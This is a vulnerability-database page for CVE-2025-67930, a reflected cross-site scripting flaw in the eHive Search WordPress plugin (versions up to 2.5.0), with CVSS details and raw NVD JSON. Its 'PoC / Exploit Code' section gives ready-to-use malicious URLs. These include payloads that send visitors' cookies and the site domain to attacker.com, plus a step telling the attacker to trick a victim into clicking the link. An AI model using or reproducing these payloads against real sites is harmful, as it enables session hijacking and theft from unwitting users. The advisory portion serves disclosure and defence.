Security Vulnerability Report
中文
CVE-2025-67930 CVSS 7.1 HIGH

CVE-2025-67930

Published: 2026-01-08 10:15:52
Last Modified: 2026-04-27 18:16:50

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Vernon Systems Limited eHive Search ehive-search allows Reflected XSS.This issue affects eHive Search: from n/a through <= 2.5.0.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

eHive Search <= 2.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-67930 Reflected XSS PoC for eHive Search WordPress Plugin --> <!-- Target: WordPress site with eHive Search plugin <= 2.5.0 --> <!-- Basic XSS PoC via search parameter --> https://target-site.com/?s=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E <!-- Alternative PoC using img onerror handler --> https://target-site.com/?s=%22%3E%3Cimg%20src=x%20onerror=alert%28%22XSS%22%29%3E <!-- Cookie stealing PoC --> https://target-site.com/?s=%3Cscript%3Edocument.location=%27https://attacker.com/steal?c=%27%2Bdocument.cookie%3C/script%3E <!-- Stored XSS to Reflected conversion via search --> https://target-site.com/?s=%3Csvg/onload=fetch(%27https://attacker.com/log?data=%27%2Bbtoa(document.domain))%3E <!-- PoC Explanation: --> <!-- 1. Replace 'target-site.com' with the vulnerable WordPress site --> <!-- 2. The 's' parameter represents the search query in eHive Search --> <!-- 3. URL encode special characters to ensure proper transmission --> <!-- 4. Social engineer victim to click the malicious link --> <!-- 5. Upon click, JavaScript executes in victim's browser context -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67930", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:51.990", "lastModified": "2026-04-27T18:16:50.237", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Vernon Systems Limited eHive Search ehive-search allows Reflected XSS.This issue affects eHive Search: from n/a through <= 2.5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ehive-search/vulnerability/wordpress-ehive-search-plugin-2-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}